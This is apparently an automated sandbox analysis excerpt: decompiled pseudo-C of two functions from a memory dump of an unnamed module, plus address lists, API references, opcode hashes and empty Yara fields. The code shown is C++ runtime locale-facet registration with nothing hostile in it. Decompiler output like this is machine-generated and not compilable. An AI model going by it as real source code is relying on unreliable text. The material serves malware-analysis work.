																																								__eflags = _t688;
																																								if(_t688 != 0) {
																																									L89:
																																									E6D4866BA(_t726 - 0x14);
																																									return E6D4A0075(_t688);
																																								} else {
																																									__eflags = _t705;
																																									if(_t705 == 0) {
																																										_push( *((intOrPtr*)(_t726 + 8)));
																																										_push(_t726 - 0x10);
																																										__eflags = E6D4914EC(_t513, _t600, _t674, _t688, _t705) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t726 - 0x20);
																																											E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t513, _t688, _t705, 0x14);
																																											E6D486653(_t726 - 0x14, 0);
																																											_t706 =  *0x6d546dcc; // 0x0
																																											 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																											 *(_t726 - 0x10) = _t706;
																																											_t406 = E6D46161C(0x6d546d80);
																																											_t607 =  *((intOrPtr*)(_t726 + 8));
																																											_t689 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t406);
																																											__eflags = _t689;
																																											if(_t689 != 0) {
																																												L96:
																																												E6D4866BA(_t726 - 0x14);
																																												return E6D4A0075(_t689);
																																											} else {
																																												__eflags = _t706;
																																												if(_t706 == 0) {
																																													_push( *((intOrPtr*)(_t726 + 8)));
																																													_push(_t726 - 0x10);
																																													__eflags = E6D491558(_t513, _t607, _t674, _t689, _t706) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t726 - 0x20);
																																														E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t513, _t689, _t706, 0x14);
																																														E6D486653(_t726 - 0x14, 0);
																																														_t707 =  *0x6d546e00; // 0x0
																																														 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																														 *(_t726 - 0x10) = _t707;
																																														_t419 = E6D46161C(0x6d546dac);
																																														_t614 =  *((intOrPtr*)(_t726 + 8));
																																														_t690 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t419);
																																														__eflags = _t690;
																																														if(_t690 != 0) {
																																															L103:
																																															E6D4866BA(_t726 - 0x14);
																																															return E6D4A0075(_t690);
																																														} else {
																																															__eflags = _t707;
																																															if(_t707 == 0) {
																																																_push( *((intOrPtr*)(_t726 + 8)));
																																																_push(_t726 - 0x10);
																																																__eflags = E6D4915C4(_t513, _t614, _t674, _t690, _t707) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6D461438(_t726 - 0x20);
																																																	E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e83cf, _t513, _t690, _t707, 0x14);
																																																	E6D486653(_t726 - 0x14, 0);
																																																	_t708 =  *0x6d546dd0; // 0x0
																																																	 *(_t726 - 4) =  *(_t726 - 4) & 0x00000000;
																																																	 *(_t726 - 0x10) = _t708;
																																																	_t432 = E6D46161C(0x6d546d60);
																																																	_t621 =  *((intOrPtr*)(_t726 + 8));
																																																	_t691 = E6D46171B( *((intOrPtr*)(_t726 + 8)), _t432);
																																																	__eflags = _t691;
																																																	if(_t691 != 0) {
																																																		L110:
																																																		E6D4866BA(_t726 - 0x14);
																																																		return E6D4A0075(_t691);
																																																	} else {
																																																		__eflags = _t708;
																																																		if(_t708 == 0) {
																																																			_push( *((intOrPtr*)(_t726 + 8)));
																																																			_push(_t726 - 0x10);
																																																			__eflags = E6D49162A(_t513, _t621, _t674, _t691, _t708) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				_t625 = _t726 - 0x20;
																																																				E6D461438(_t625);
																																																				E6D4A3D74(_t726 - 0x20, 0x6d543504);
																																																				asm("int3");
																																																				E6D4A00AC(0x6d4e851f, _t513, _t691, _t708, 4);
																																																				_t709 = _t625;
																																																				 *(_t726 - 0x10) = _t709;
																																																				 *((intOrPtr*)(_t709 + 4)) =  *((intOrPtr*)(_t726 + 0xc));
																																																				_push( *((intOrPtr*)(_t726 + 0x14)));
																																																				_t231 = _t726 - 4;
																																																				 *_t231 =  *(_t726 - 4) & 0x00000000;
																																																				__eflags =  *_t231;
																																																				 *_t709 = 0x6d4ec0c4;
																																																				 *((char*)(_t709 + 0x28)) =  *((intOrPtr*)(_t726 + 0x10));
																																																				E6D49542F(_t513, _t625, _t674, _t691, _t709,  *_t231);
																																																				return E6D4A0075(_t709,  *((intOrPtr*)(_t726 + 8)));
																																																			} else {
																																																				_t691 =  *(_t726 - 0x10);
																																																				 *(_t726 - 0x10) = _t691;
																																																				 *(_t726 - 4) = 1;
																																																				E6D486FD3(__eflags, _t691);
																																																				 *0x6d4ea26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t691 + 4))))();
																																																				 *0x6d546dd0 = _t691;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t691 = _t708;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t690 =  *(_t726 - 0x10);
																																																	 *(_t726 - 0x10) = _t690;
																																																	 *(_t726 - 4) = 1;
																																																	E6D486FD3(__eflags, _t690);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t690 + 4))))();
																																																	 *0x6d546e00 = _t690;
																																																	goto L103;
																																																}
																																															} else {
																																																_t690 = _t707;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t689 =  *(_t726 - 0x10);
																																														 *(_t726 - 0x10) = _t689;
																																														 *(_t726 - 4) = 1;
																																														E6D486FD3(__eflags, _t689);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t689 + 4))))();
																																														 *0x6d546dcc = _t689;
																																														goto L96;
																																													}
																																												} else {
																																													_t689 = _t706;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t688 =  *(_t726 - 0x10);
																																											 *(_t726 - 0x10) = _t688;
																																											 *(_t726 - 4) = 1;
																																											E6D486FD3(__eflags, _t688);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t688 + 4))))();
																																											 *0x6d546dfc = _t688;
																																											goto L89;
																																										}
																																									} else {
																																										_t688 = _t705;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t687 =  *(_t726 - 0x10);
																																								 *(_t726 - 0x10) = _t687;
																																								 *(_t726 - 4) = 1;
																																								E6D486FD3(__eflags, _t687);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t687 + 4))))();
																																								 *0x6d546de0 = _t687;
																																								goto L82;
																																							}
																																						} else {
																																							_t687 = _t704;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t686 =  *(_t726 - 0x10);
																																					 *(_t726 - 0x10) = _t686;
																																					 *(_t726 - 4) = 1;
																																					E6D486FD3(__eflags, _t686);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t686 + 4))))();
																																					 *0x6d546ddc = _t686;
																																					goto L75;
																																				}
																																			} else {
																																				_t686 = _t703;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t685 =  *(_t726 - 0x10);
																																		 *(_t726 - 0x10) = _t685;
																																		 *(_t726 - 4) = 1;
																																		E6D486FD3(__eflags, _t685);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t685 + 4))))();
																																		 *0x6d546db0 = _t685;
																																		goto L68;
																																	}
																																} else {
																																	_t685 = _t702;
																																	goto L68;
																																}
																															}
																														} else {
																															_t684 =  *(_t726 - 0x10);
																															 *(_t726 - 0x10) = _t684;
																															 *(_t726 - 4) = 1;
																															E6D486FD3(__eflags, _t684);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t684 + 4))))();
																															 *0x6d546dd8 = _t684;
																															goto L61;
																														}
																													} else {
																														_t684 = _t701;
																														goto L61;
																													}
																												}
																											} else {
																												_t683 =  *(_t726 - 0x10);
																												 *(_t726 - 0x10) = _t683;
																												 *(_t726 - 4) = 1;
																												E6D486FD3(__eflags, _t683);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t683 + 4))))();
																												 *0x6d546dc4 = _t683;
																												goto L54;
																											}
																										} else {
																											_t683 = _t700;
																											goto L54;
																										}
																									}
																								} else {
																									_t682 =  *(_t726 - 0x10);
																									 *(_t726 - 0x10) = _t682;
																									 *(_t726 - 4) = 1;
																									E6D486FD3(__eflags, _t682);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t682 + 4))))();
																									 *0x6d546dc8 = _t682;
																									goto L47;
																								}
																							} else {
																								_t682 = _t699;
																								goto L47;
																							}
																						}
																					} else {
																						_t681 =  *(_t726 - 0x10);
																						 *(_t726 - 0x10) = _t681;
																						 *(_t726 - 4) = 1;
																						E6D486FD3(__eflags, _t681);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t681 + 4))))();
																						 *0x6d546df4 = _t681;
																						goto L40;
																					}
																				} else {
																					_t681 = _t698;
																					goto L40;
																				}
																			}
																		} else {
																			_t680 =  *(_t726 - 0x10);
																			 *(_t726 - 0x10) = _t680;
																			 *(_t726 - 4) = 1;
																			E6D486FD3(__eflags, _t680);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t680 + 4))))();
																			 *0x6d546df8 = _t680;
																			goto L33;
																		}
																	} else {
																		_t680 = _t697;
																		goto L33;
																	}
																}
															} else {
																_t679 =  *(_t726 - 0x10);
																 *(_t726 - 0x10) = _t679;
																 *(_t726 - 4) = 1;
																E6D486FD3(__eflags, _t679);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t679 + 4))))();
																 *0x6d546dc0 = _t679;
																goto L26;
															}
														} else {
															_t679 = _t696;
															goto L26;
														}
													}
												} else {
													_t678 =  *(_t726 - 0x10);
													 *(_t726 - 0x10) = _t678;
													 *(_t726 - 4) = 1;
													E6D486FD3(__eflags, _t678);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t678 + 4))))();
													 *0x6d546df0 = _t678;
													goto L19;
												}
											} else {
												_t678 = _t695;
												goto L19;
											}
										}
									} else {
										_t677 =  *(_t726 - 0x10);
										 *(_t726 - 0x10) = _t677;
										 *(_t726 - 4) = 1;
										E6D486FD3(__eflags, _t677);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t677 + 4))))();
										 *0x6d546dbc = _t677;
										goto L12;
									}
								} else {
									_t677 = _t694;
									goto L12;
								}
							}
						} else {
							_t676 =  *(_t726 - 0x10);
							 *(_t726 - 0x10) = _t676;
							 *(_t726 - 4) = 1;
							E6D486FD3(__eflags, _t676);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t676 + 4))))();
							 *0x6d546dec = _t676;
							goto L5;
						}
					} else {
						_t676 = _t693;
						goto L5;
					}
				}
			}

0x6d48f2cf
0x6d48f2cf
0x6d48f2d6
0x6d48f2e0
0x6d48f2e5
0x6d48f2f0
0x6d48f2f4
0x6d48f2f7
0x6d48f2fc
0x6d48f300
0x6d48f305
0x6d48f309
0x6d48f34e
0x6d48f351
0x6d48f35d
0x6d48f30b
0x6d48f30d
0x6d48f313
0x6d48f319
0x6d48f321
0x6d48f324
0x6d48f361
0x6d48f36f
0x6d48f374
0x6d48f37c
0x6d48f386
0x6d48f38b
0x6d48f396
0x6d48f39a
0x6d48f39d
0x6d48f3a2
0x6d48f3ab
0x6d48f3ad
0x6d48f3af
0x6d48f3f4
0x6d48f3f7
0x6d48f403
0x6d48f3b1
0x6d48f3b1
0x6d48f3b3
0x6d48f3b9
0x6d48f3bf
0x6d48f3c7
0x6d48f3ca
0x6d48f407
0x6d48f415
0x6d48f41a
0x6d48f422
0x6d48f42c
0x6d48f431
0x6d48f43c
0x6d48f440
0x6d48f443
0x6d48f448
0x6d48f451
0x6d48f453
0x6d48f455
0x6d48f49a
0x6d48f49d
0x6d48f4a9
0x6d48f457
0x6d48f457
0x6d48f459
0x6d48f45f
0x6d48f465
0x6d48f46d
0x6d48f470
0x6d48f4ad
0x6d48f4bb
0x6d48f4c0
0x6d48f4c8
0x6d48f4d2
0x6d48f4d7
0x6d48f4e2
0x6d48f4e6
0x6d48f4e9
0x6d48f4ee
0x6d48f4f7
0x6d48f4f9
0x6d48f4fb
0x6d48f540
0x6d48f543
0x6d48f54f
0x6d48f4fd
0x6d48f4fd
0x6d48f4ff
0x6d48f505
0x6d48f50b
0x6d48f513
0x6d48f516
0x6d48f553
0x6d48f561
0x6d48f566
0x6d48f56e
0x6d48f578
0x6d48f57d
0x6d48f588
0x6d48f58c
0x6d48f58f
0x6d48f594
0x6d48f59d
0x6d48f59f
0x6d48f5a1
0x6d48f5e6
0x6d48f5e9
0x6d48f5f5
0x6d48f5a3
0x6d48f5a3
0x6d48f5a5
0x6d48f5ab
0x6d48f5b1
0x6d48f5b9
0x6d48f5bc
0x6d48f5f9
0x6d48f607
0x6d48f60c
0x6d48f614
0x6d48f61e
0x6d48f623
0x6d48f62e
0x6d48f632
0x6d48f635
0x6d48f63a
0x6d48f643
0x6d48f645
0x6d48f647
0x6d48f68c
0x6d48f68f
0x6d48f69b
0x6d48f649
0x6d48f649
0x6d48f64b
0x6d48f651
0x6d48f657
0x6d48f65f
0x6d48f662
0x6d48f69f
0x6d48f6ad
0x6d48f6b2
0x6d48f6ba
0x6d48f6c4
0x6d48f6c9
0x6d48f6d4
0x6d48f6d8
0x6d48f6db
0x6d48f6e0
0x6d48f6e9
0x6d48f6eb
0x6d48f6ed
0x6d48f732
0x6d48f735
0x6d48f741
0x6d48f6ef
0x6d48f6ef
0x6d48f6f1
0x6d48f6f7
0x6d48f6fd
0x6d48f705
0x6d48f708
0x6d48f745
0x6d48f753
0x6d48f758
0x6d48f760
0x6d48f76a
0x6d48f76f
0x6d48f77a
0x6d48f77e
0x6d48f781
0x6d48f786
0x6d48f78f
0x6d48f791
0x6d48f793
0x6d48f7d8
0x6d48f7db
0x6d48f7e7
0x6d48f795
0x6d48f795
0x6d48f797
0x6d48f79d
0x6d48f7a3
0x6d48f7ab
0x6d48f7ae
0x6d48f7eb
0x6d48f7f9
0x6d48f7fe
0x6d48f806
0x6d48f810
0x6d48f815
0x6d48f820
0x6d48f824
0x6d48f827
0x6d48f82c
0x6d48f835
0x6d48f837
0x6d48f839
0x6d48f87e
0x6d48f881
0x6d48f88d
0x6d48f83b
0x6d48f83b
0x6d48f83d
0x6d48f843
0x6d48f849
0x6d48f851
0x6d48f854
0x6d48f891
0x6d48f89f
0x6d48f8a4
0x6d48f8ac
0x6d48f8b6
0x6d48f8bb
0x6d48f8c6
0x6d48f8ca
0x6d48f8cd
0x6d48f8d2
0x6d48f8db
0x6d48f8dd
0x6d48f8df
0x6d48f924
0x6d48f927
0x6d48f933
0x6d48f8e1
0x6d48f8e1
0x6d48f8e3
0x6d48f8e9
0x6d48f8ef
0x6d48f8f7
0x6d48f8fa
0x6d48f937
0x6d48f945
0x6d48f94a
0x6d48f952
0x6d48f95c
0x6d48f961
0x6d48f96c
0x6d48f970
0x6d48f973
0x6d48f978
0x6d48f981
0x6d48f983
0x6d48f985
0x6d48f9ca
0x6d48f9cd
0x6d48f9d9
0x6d48f987
0x6d48f987
0x6d48f989
0x6d48f98f
0x6d48f995
0x6d48f99d
0x6d48f9a0
0x6d48f9dd
0x6d48f9eb
0x6d48f9f0
0x6d48f9f8
0x6d48fa02
0x6d48fa07
0x6d48fa12
0x6d48fa16
0x6d48fa19
0x6d48fa1e
0x6d48fa27
0x6d48fa29
0x6d48fa2b
0x6d48fa70
0x6d48fa73
0x6d48fa7f
0x6d48fa2d
0x6d48fa2d
0x6d48fa2f
0x6d48fa35
0x6d48fa3b
0x6d48fa43
0x6d48fa46
0x6d48fa83
0x6d48fa91
0x6d48fa96
0x6d48fa9e
0x6d48faa8
0x6d48faad
0x6d48fab8
0x6d48fabc
0x6d48fabf
0x6d48fac4
0x6d48facd
0x6d48facf
0x6d48fad1
0x6d48fb16
0x6d48fb19
0x6d48fb25
0x6d48fad3
0x6d48fad3
0x6d48fad5
0x6d48fadb
0x6d48fae1
0x6d48fae9
0x6d48faec
0x6d48fb29
0x6d48fb37
0x6d48fb3c
0x6d48fb44
0x6d48fb4e
0x6d48fb53
0x6d48fb5e
0x6d48fb62
0x6d48fb65
0x6d48fb6a
0x6d48fb73
0x6d48fb75
0x6d48fb77
0x6d48fbbc
0x6d48fbbf
0x6d48fbcb
0x6d48fb79
0x6d48fb79
0x6d48fb7b
0x6d48fb81
0x6d48fb87
0x6d48fb8f
0x6d48fb92
0x6d48fbcf
0x6d48fbdd
0x6d48fbe2
0x6d48fbea
0x6d48fbf4
0x6d48fbf9
0x6d48fc04
0x6d48fc08
0x6d48fc0b
0x6d48fc10
0x6d48fc19
0x6d48fc1b
0x6d48fc1d
0x6d48fc62
0x6d48fc65
0x6d48fc71
0x6d48fc1f
0x6d48fc1f
0x6d48fc21
0x6d48fc27
0x6d48fc2d
0x6d48fc35
0x6d48fc38
0x6d48fc75
0x6d48fc83
0x6d48fc88
0x6d48fc90
0x6d48fc9a
0x6d48fc9f
0x6d48fcaa
0x6d48fcae
0x6d48fcb1
0x6d48fcb6
0x6d48fcbf
0x6d48fcc1
0x6d48fcc3
0x6d48fd08
0x6d48fd0b
0x6d48fd17
0x6d48fcc5
0x6d48fcc5
0x6d48fcc7
0x6d48fccd
0x6d48fcd3
0x6d48fcdb
0x6d48fcde
0x6d48fd18
0x6d48fd1b
0x6d48fd29
0x6d48fd2e
0x6d48fd36
0x6d48fd3b
0x6d48fd3d
0x6d48fd43
0x6d48fd46
0x6d48fd4f
0x6d48fd4f
0x6d48fd4f
0x6d48fd53
0x6d48fd59
0x6d48fd5c
0x6d48fd68
0x6d48fce0
0x6d48fce0
0x6d48fce3
0x6d48fce7
0x6d48fceb
0x6d48fcf8
0x6d48fd00
0x6d48fd02
0x00000000
0x6d48fd02
0x6d48fcc9
0x6d48fcc9
0x00000000
0x6d48fcc9
0x6d48fcc7
0x6d48fc3a
0x6d48fc3a
0x6d48fc3d
0x6d48fc41
0x6d48fc45
0x6d48fc52
0x6d48fc5a
0x6d48fc5c
0x00000000
0x6d48fc5c
0x6d48fc23
0x6d48fc23
0x00000000
0x6d48fc23
0x6d48fc21
0x6d48fb94
0x6d48fb94
0x6d48fb97
0x6d48fb9b
0x6d48fb9f
0x6d48fbac
0x6d48fbb4
0x6d48fbb6
0x00000000
0x6d48fbb6
0x6d48fb7d
0x6d48fb7d
0x00000000
0x6d48fb7d
0x6d48fb7b
0x6d48faee
0x6d48faee
0x6d48faf1
0x6d48faf5
0x6d48faf9
0x6d48fb06
0x6d48fb0e
0x6d48fb10
0x00000000
0x6d48fb10
0x6d48fad7
0x6d48fad7
0x00000000
0x6d48fad7
0x6d48fad5
0x6d48fa48
0x6d48fa48
0x6d48fa4b
0x6d48fa4f
0x6d48fa53
0x6d48fa60
0x6d48fa68
0x6d48fa6a
0x00000000
0x6d48fa6a
0x6d48fa31
0x6d48fa31
0x00000000
0x6d48fa31
0x6d48fa2f
0x6d48f9a2
0x6d48f9a2
0x6d48f9a5
0x6d48f9a9
0x6d48f9ad
0x6d48f9ba
0x6d48f9c2
0x6d48f9c4
0x00000000
0x6d48f9c4
0x6d48f98b
0x6d48f98b
0x00000000
0x6d48f98b
0x6d48f989
0x6d48f8fc
0x6d48f8fc
0x6d48f8ff
0x6d48f903
0x6d48f907
0x6d48f914
0x6d48f91c
0x6d48f91e
0x00000000
0x6d48f91e
0x6d48f8e5
0x6d48f8e5
0x00000000
0x6d48f8e5
0x6d48f8e3
0x6d48f856
0x6d48f856
0x6d48f859
0x6d48f85d
0x6d48f861
0x6d48f86e
0x6d48f876
0x6d48f878
0x00000000
0x6d48f878
0x6d48f83f
0x6d48f83f
0x00000000
0x6d48f83f
0x6d48f83d
0x6d48f7b0
0x6d48f7b0
0x6d48f7b3
0x6d48f7b7
0x6d48f7bb
0x6d48f7c8
0x6d48f7d0
0x6d48f7d2
0x00000000
0x6d48f7d2
0x6d48f799
0x6d48f799
0x00000000
0x6d48f799
0x6d48f797
0x6d48f70a
0x6d48f70a
0x6d48f70d
0x6d48f711
0x6d48f715
0x6d48f722
0x6d48f72a
0x6d48f72c
0x00000000
0x6d48f72c
0x6d48f6f3
0x6d48f6f3
0x00000000
0x6d48f6f3
0x6d48f6f1
0x6d48f664
0x6d48f664
0x6d48f667
0x6d48f66b
0x6d48f66f
0x6d48f67c
0x6d48f684
0x6d48f686
0x00000000
0x6d48f686
0x6d48f64d
0x6d48f64d
0x00000000
0x6d48f64d
0x6d48f64b
0x6d48f5be
0x6d48f5be
0x6d48f5c1
0x6d48f5c5
0x6d48f5c9
0x6d48f5d6
0x6d48f5de
0x6d48f5e0
0x00000000
0x6d48f5e0
0x6d48f5a7
0x6d48f5a7
0x00000000
0x6d48f5a7
0x6d48f5a5
0x6d48f518
0x6d48f518
0x6d48f51b
0x6d48f51f
0x6d48f523
0x6d48f530
0x6d48f538
0x6d48f53a
0x00000000
0x6d48f53a
0x6d48f501
0x6d48f501
0x00000000
0x6d48f501
0x6d48f4ff
0x6d48f472
0x6d48f472
0x6d48f475
0x6d48f479
0x6d48f47d
0x6d48f48a
0x6d48f492
0x6d48f494
0x00000000
0x6d48f494
0x6d48f45b
0x6d48f45b
0x00000000
0x6d48f45b
0x6d48f459
0x6d48f3cc
0x6d48f3cc
0x6d48f3cf
0x6d48f3d3
0x6d48f3d7
0x6d48f3e4
0x6d48f3ec
0x6d48f3ee
0x00000000
0x6d48f3ee
0x6d48f3b5
0x6d48f3b5
0x00000000
0x6d48f3b5
0x6d48f3b3
0x6d48f326
0x6d48f326
0x6d48f329
0x6d48f32d
0x6d48f331
0x6d48f33e
0x6d48f346
0x6d48f348
0x00000000
0x6d48f348
0x6d48f30f
0x6d48f30f
0x00000000
0x6d48f30f
0x6d48f30d

APIs

__EH_prolog3.LIBCMT ref: 6D48F2D6
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F2E0
int.LIBCPMT ref: 6D48F2F7

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F331
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F351
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F36F

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4d16cf7d616b5c8aadcd97522df63b269be8a63005f818f5aa51c1256fff70a0
Instruction ID: adc5be253cd6340c1cefa14c96d1e177b0779ded549592bfacb6dcde162fed30
Opcode Fuzzy Hash: 4d16cf7d616b5c8aadcd97522df63b269be8a63005f818f5aa51c1256fff70a0
Instruction Fuzzy Hash: A311E0758082199BCF01EBA0C840FEDB775AFA4315F2A400DD622AB395DB70EE408BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4846AB, Relevance: 9.1, APIs: 6, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D4846AB(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				intOrPtr* _t33;
				void* _t45;
				intOrPtr* _t76;
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr* _t87;
				void* _t88;

				_t62 = __ebx;
				E6D4A00AC(0x6d4e8144, __ebx, __edi, __esi, 0x14);
				E6D486653(_t88 - 0x14, 0);
				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
				_t83 =  *0x6d55ce84; // 0x4e61c0
				 *((intOrPtr*)(_t88 - 0x10)) = _t83;
				_t32 = E6D46161C(0x6d55cea8);
				_t65 =  *((intOrPtr*)(_t88 + 8));
				_t33 = E6D46171B( *((intOrPtr*)(_t88 + 8)), _t32);
				_t86 = _t33;
				if(_t33 != 0) {
					L5:
					E6D4866BA(_t88 - 0x14);
					return E6D4A0075(_t86);
				} else {
					if(_t83 == 0) {
						_push( *((intOrPtr*)(_t88 + 8)));
						_push(_t88 - 0x10);
						__eflags = E6D484FCE(__ebx, _t65, __edx, _t83, _t86) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t88 - 0x20);
							E6D4A3D74(_t88 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e816f, __ebx, _t83, _t86, 0x18);
							E6D486653(_t88 - 0x14, 0);
							 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
							_t84 =  *0x6d55ce7c; // 0x4e93d8
							 *((intOrPtr*)(_t88 - 0x10)) = _t84;
							_t45 = E6D46161C(0x6d55ce90);
							_t72 =  *((intOrPtr*)(_t88 + 8));
							_t87 = E6D46171B( *((intOrPtr*)(_t88 + 8)), _t45);
							__eflags = _t87;
							if(_t87 != 0) {
								L12:
								E6D4866BA(_t88 - 0x14);
								return E6D4A0075(_t87);
							} else {
								__eflags = _t84;
								if(_t84 == 0) {
									_push( *((intOrPtr*)(_t88 + 8)));
									_push(_t88 - 0x10);
									__eflags = E6D484F5F(_t62, _t72, __edx, _t84, _t87) - 0xffffffff;
									if(__eflags == 0) {
										_t76 = _t88 - 0x20;
										E6D461438(_t76);
										E6D4A3D74(_t88 - 0x20, 0x6d543504);
										asm("int3");
										 *_t76 = __edx;
										return _t76;
									} else {
										_t87 =  *((intOrPtr*)(_t88 - 0x10));
										 *((intOrPtr*)(_t88 - 0x10)) = _t87;
										 *(_t88 - 4) = 1;
										E6D486FD3(__eflags, _t87);
										 *((intOrPtr*)( *_t87 + 4))();
										 *0x6d55ce7c = _t87;
										goto L12;
									}
								} else {
									_t87 = _t84;
									goto L12;
								}
							}
						} else {
							_t86 =  *((intOrPtr*)(_t88 - 0x10));
							 *((intOrPtr*)(_t88 - 0x10)) = _t86;
							 *(_t88 - 4) = 1;
							E6D486FD3(__eflags, _t86);
							 *((intOrPtr*)( *_t86 + 4))();
							 *0x6d55ce84 = _t86;
							goto L5;
						}
					} else {
						_t86 = _t83;
						goto L5;
					}
				}
			}

0x6d4846ab
0x6d4846b2
0x6d4846bc
0x6d4846c1
0x6d4846ca
0x6d4846d0
0x6d4846d3
0x6d4846d8
0x6d4846dc
0x6d4846e1
0x6d4846e5
0x6d484720
0x6d484723
0x6d48472f
0x6d4846e7
0x6d4846e9
0x6d4846ef
0x6d4846f5
0x6d4846fd
0x6d484700
0x6d484733
0x6d484741
0x6d484746
0x6d48474e
0x6d484758
0x6d48475d
0x6d484766
0x6d48476c
0x6d48476f
0x6d484774
0x6d48477d
0x6d48477f
0x6d484781
0x6d4847bc
0x6d4847bf
0x6d4847cb
0x6d484783
0x6d484783
0x6d484785
0x6d48478b
0x6d484791
0x6d484799
0x6d48479c
0x6d4847cc
0x6d4847cf
0x6d4847dd
0x6d4847e2
0x6d4847e3
0x6d4847e7
0x6d48479e
0x6d48479e
0x6d4847a1
0x6d4847a5
0x6d4847a9
0x6d4847b3
0x6d4847b6
0x00000000
0x6d4847b6
0x6d484787
0x6d484787
0x00000000
0x6d484787
0x6d484785
0x6d484702
0x6d484702
0x6d484705
0x6d484709
0x6d48470d
0x6d484717
0x6d48471a
0x00000000
0x6d48471a
0x6d4846eb
0x6d4846eb
0x00000000
0x6d4846eb
0x6d4846e9

APIs

__EH_prolog3.LIBCMT ref: 6D4846B2
std::_Lockit::_Lockit.LIBCPMT ref: 6D4846BC
int.LIBCPMT ref: 6D4846D3

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48470D
std::_Lockit::~_Lockit.LIBCPMT ref: 6D484723
__CxxThrowException@8.LIBVCRUNTIME ref: 6D484741

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: ea45810abce178f2033dc8a327b6f005c1a76d7229755c275063784eaf2a641d
Instruction ID: ab849b927e5c8dde0457f247ba16e807a701ed3c22eeb1db519848436ca134f3
Opcode Fuzzy Hash: ea45810abce178f2033dc8a327b6f005c1a76d7229755c275063784eaf2a641d
Instruction Fuzzy Hash: 4811E571C081659BCF05DBA4C844EEDB775AF54395F2A010CE616B7291EB74DE00C7E1

Uniqueness

Uniqueness Score: -1.00%

